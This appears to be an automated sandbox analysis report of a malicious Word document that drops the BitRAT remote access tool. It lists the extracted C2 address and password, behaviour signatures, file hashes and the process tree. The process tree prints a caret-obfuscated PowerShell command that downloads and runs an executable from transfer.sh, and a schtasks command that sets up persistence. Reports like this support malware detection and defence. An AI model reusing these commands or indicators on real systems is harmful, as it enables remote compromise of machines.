Analysis

  • max time kernel
    39s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:17

General

  • Target

    Documento_Orslgroup_S.R.L_09_2023.doc

  • Size

    191KB

  • MD5

    68297123bc1ddbbd9336aa121a9dd534

  • SHA1

    2d8016319edb893e0ae600ba8c89f00a30466967

  • SHA256

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b

  • SHA512

    29e3e9e7e8a1b5c9fd54d97379e7f73cc2ee8174b950d7bf1b44f6f129893d6dec64c8ddb63f071184ea93bc88f1e5b7d0e1f99304c4af54f42af9042f6d092b

  • SSDEEP

    3072:SbiyWTxSoVHpNY6nemhInf/va46YP6z+dzL:miyWTwoVHp6m0/yl6H9L

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:792
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Users\Public\dx5ys.exe
          "C:\Users\Public\dx5ys.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Users\Public\dx5ys.exe
            "C:\Users\Public\dx5ys.exe"
            5⤵
            • Executes dropped EXE
            PID:2344
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
            5⤵
              PID:1224
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Public\dx5ys.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
              5⤵
                PID:1692
              • C:\Windows\SysWOW64\cmd.exe
                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2476
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                  6⤵
                  • Creates scheduled task(s)
                  PID:408
      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        C:\Users\Admin\AppData\Roaming\pint\pint.exe
        1⤵
        • Executes dropped EXE
        PID:3356

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djsfxfnf.ahk.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        960KB

        MD5

        abe58006ba059f749c91a1cce690207e

        SHA1

        378c8ee12d977f0b359af0700c007def9974fe0d

        SHA256

        3e1de8d47262fd1aa8aeb25e366e6212bcd7cf55a59aa8369849ab8ebc7103c7

        SHA512

        b1274373cacc856a634586f3dd734b51b609c306037bb4822699413cd32cfa10e57d42b9960955cdc91ee0eda5a940247f9f1ce4c03c3073f90b3717b28ace9b

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        1024KB

        MD5

        154520480b1547aabe5eb883ba684011

        SHA1

        a95a4a951ac13abcdb09a2859169d35cd15b6e54

        SHA256

        50020a1f7e48ac867c761f719249746fbc83119f6871f0deaf52f80d86b5d083

        SHA512

        1ff2ff24a7d0e4a60b67e08f58c3349ce8b08c0b571d3b1eeb7feacea429ce0d06c0df4615841048cc84a7cfa38ab065443903af5c2c996b378832b4df918520

      • C:\Users\Public\dx5ys.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\dx5ys.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\dx5ys.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • memory/792-33-0x00000171247B0000-0x0000017125780000-memory.dmp
        Filesize

        15.8MB

      • memory/792-0-0x00007FFE6BAD0000-0x00007FFE6BAE0000-memory.dmp
        Filesize

        64KB

      • memory/792-9-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-10-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-11-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-12-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-13-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-14-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-16-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-15-0x00007FFE69440000-0x00007FFE69450000-memory.dmp
        Filesize

        64KB

      • memory/792-17-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-18-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-19-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-20-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-21-0x00007FFE69440000-0x00007FFE69450000-memory.dmp
        Filesize

        64KB

      • memory/792-31-0x00000171247B0000-0x0000017125780000-memory.dmp
        Filesize

        15.8MB

      • memory/792-32-0x00000171247B0000-0x0000017125780000-memory.dmp
        Filesize

        15.8MB

      • memory/792-7-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-1-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-6-0x00007FFE6BAD0000-0x00007FFE6BAE0000-memory.dmp
        Filesize

        64KB

      • memory/792-5-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-8-0x00007FFE6BAD0000-0x00007FFE6BAE0000-memory.dmp
        Filesize

        64KB

      • memory/792-3-0x00007FFE6BAD0000-0x00007FFE6BAE0000-memory.dmp
        Filesize

        64KB

      • memory/792-4-0x00007FFE6BAD0000-0x00007FFE6BAE0000-memory.dmp
        Filesize

        64KB

      • memory/792-48-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-49-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-51-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/792-52-0x00000171247B0000-0x0000017125780000-memory.dmp
        Filesize

        15.8MB

      • memory/792-53-0x00000171247B0000-0x0000017125780000-memory.dmp
        Filesize

        15.8MB

      • memory/792-59-0x00000171247B0000-0x0000017125780000-memory.dmp
        Filesize

        15.8MB

      • memory/792-2-0x00007FFEABA50000-0x00007FFEABC45000-memory.dmp
        Filesize

        2.0MB

      • memory/2344-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2344-81-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2344-79-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2344-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3356-87-0x0000000074A20000-0x00000000751D0000-memory.dmp
        Filesize

        7.7MB

      • memory/3544-82-0x0000000074A20000-0x00000000751D0000-memory.dmp
        Filesize

        7.7MB

      • memory/3544-73-0x0000000074A20000-0x00000000751D0000-memory.dmp
        Filesize

        7.7MB

      • memory/3544-71-0x0000000000C10000-0x0000000000FE8000-memory.dmp
        Filesize

        3.8MB

      • memory/3544-74-0x0000000005F90000-0x0000000006534000-memory.dmp
        Filesize

        5.6MB

      • memory/3544-75-0x00000000059D0000-0x00000000059E0000-memory.dmp
        Filesize

        64KB

      • memory/4224-39-0x000001F146DA0000-0x000001F146DC2000-memory.dmp
        Filesize

        136KB

      • memory/4224-72-0x00007FFE7E210000-0x00007FFE7ECD1000-memory.dmp
        Filesize

        10.8MB

      • memory/4224-70-0x000001F146DD0000-0x000001F146DE0000-memory.dmp
        Filesize

        64KB

      • memory/4224-61-0x000001F146DD0000-0x000001F146DE0000-memory.dmp
        Filesize

        64KB

      • memory/4224-60-0x00007FFE7E210000-0x00007FFE7ECD1000-memory.dmp
        Filesize

        10.8MB

      • memory/4224-47-0x000001F146DD0000-0x000001F146DE0000-memory.dmp
        Filesize

        64KB

      • memory/4224-46-0x000001F146DD0000-0x000001F146DE0000-memory.dmp
        Filesize

        64KB

      • memory/4224-41-0x000001F146DD0000-0x000001F146DE0000-memory.dmp
        Filesize

        64KB

      • memory/4224-40-0x00007FFE7E210000-0x00007FFE7ECD1000-memory.dmp
        Filesize

        10.8MB